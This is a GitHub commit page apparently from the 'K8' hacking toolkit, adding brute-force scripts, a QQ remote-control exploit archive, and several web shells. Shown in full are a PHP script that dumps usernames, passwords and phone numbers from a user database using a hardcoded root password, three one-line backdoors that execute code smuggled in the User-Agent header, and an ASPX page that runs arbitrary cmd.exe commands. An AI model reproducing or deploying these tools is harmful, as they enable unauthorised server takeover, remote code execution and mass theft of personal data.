Skip to content

Commit c850d7a

Browse files
authored
Add files via upload
1 parent 27d685b commit c850d7a

10 files changed

+63
-0
lines changed

K8_FTP爆破PHP脚本20151010.rar

875 Bytes
Binary file not shown.

K8_Mysql爆破PHP脚本20151009.rar

944 Bytes
Binary file not shown.

K8_mysql脱裤20170114(千万).php

Lines changed: 23 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,23 @@
1+
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
2+
<?php
3+
$conn = @mysql_connect("192.168.241.89", "root", "Vega2010##") or die("X Connect failed");
4+
mysql_select_db("chacha_cloud", $conn);
5+
mysql_query("set names 'UTF-8'");
6+
7+
$sql="select username,password,phone from user limit 12500000,500000";
8+
$query=mysql_query($sql);
9+
while($row=mysql_fetch_array($query)){
10+
$fp = fopen('t4/14.csv', 'a');
11+
fwrite($fp,'"'.@$row[username].'","'.@$row[password].'"'.'","'.@$row[phone].'"'."\n");
12+
fclose($fp);
13+
}
14+
echo 'finished';
15+
?>
16+
17+
log_app
18+
device_name,imei,phone
19+
20+
user
21+
username,password,phone,fullname
22+
username,password,phone,address
23+
username,password,phone,email

K8飞刀A专用UA一句话木马.asp

Lines changed: 1 addition & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1 @@
1+
<%uastr=Request.ServerVariables("HTTP_USER_AGENT"):pwd="tom":StartStrPos = Instr(uastr, "k0")+Len("k0") :EndStrPos = Instr(uastr,"==="):Length = EndStrPos - StartStrPos:Res= Mid(uastr,StartStrPos,Length):if (pwd=Res) then:execute replace(uastr,"k0"+Res+"===",""):end if%>
Lines changed: 1 addition & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1 @@
1+
<? $ua=@$_SERVER["HTTP_USER_AGENT"];$row=split("===",$ua);echo "->|";if($row[0]=="tom")@eval($row[1]);echo "|<-";?>

K8飞刀专用UA一句话木马.asxp

Lines changed: 1 addition & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1 @@
1+
<%@ Page Language="Jscript" %><%var pwd="tom";var uastr=Request.UserAgent;if (uastr.Substring(0, uastr.IndexOf("==="))== pwd) {var code=uastr.Replace(pwd+"===","");eval(code,"unsafe"); };%>

QQ远控 ClientKey 利用工具.rar

719 KB
Binary file not shown.

k8cmd.ascx

1.67 KB
Binary file not shown.

k8cmd.aspx

Lines changed: 37 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,37 @@
1+
<%@ Page Language="C#" Debug="true" Trace="false" %>
2+
<%@ Import Namespace="System.Diagnostics" %>
3+
<%@ Import Namespace="System.IO" %>
4+
<script Language="c#" runat="server">
5+
void Page_Load(object sender, EventArgs e)
6+
{
7+
txt_WebPath.Text = Server.MapPath(".");
8+
}
9+
string ExcuteCmd(string arg)
10+
{
11+
ProcessStartInfo psi = new ProcessStartInfo();
12+
psi.FileName = "cmd.exe";
13+
psi.Arguments = "/c "+arg;
14+
psi.RedirectStandardOutput = true;
15+
psi.UseShellExecute = false;
16+
Process p = Process.Start(psi);
17+
StreamReader stmrdr = p.StandardOutput;
18+
string s = stmrdr.ReadToEnd();
19+
stmrdr.Close();
20+
return s;
21+
}
22+
void cmdExe_Click(object sender, System.EventArgs e)
23+
{
24+
cmdResult.Text = cmdResult.Text + Server.HtmlEncode(ExcuteCmd(txt_cmd.Text));
25+
}
26+
</script>
27+
<HTML><body ><form id="cmd" method="post" runat="server">
28+
<br />
29+
WebPath:
30+
<asp:TextBox ID="txt_WebPath" runat="server" Width="579px"></asp:TextBox>
31+
&nbsp; <br />
32+
<br />
33+
<asp:Label ID="Label2" runat="server" Text="Commond: "></asp:Label>
34+
<asp:TextBox ID="txt_cmd" runat="server" Width="581px"></asp:TextBox>&nbsp;
35+
<asp:Button ID="Button1" runat="server" onclick="cmdExe_Click" Text="Execute" /><br /><br />
36+
<asp:TextBox ID="cmdResult" runat="server" Height="662px" Width="798px" TextMode="MultiLine"></asp:TextBox>
37+
</form></body></HTML>

k8飞刀CMD.jsp

744 Bytes
Binary file not shown.

0 commit comments

Comments
 (0)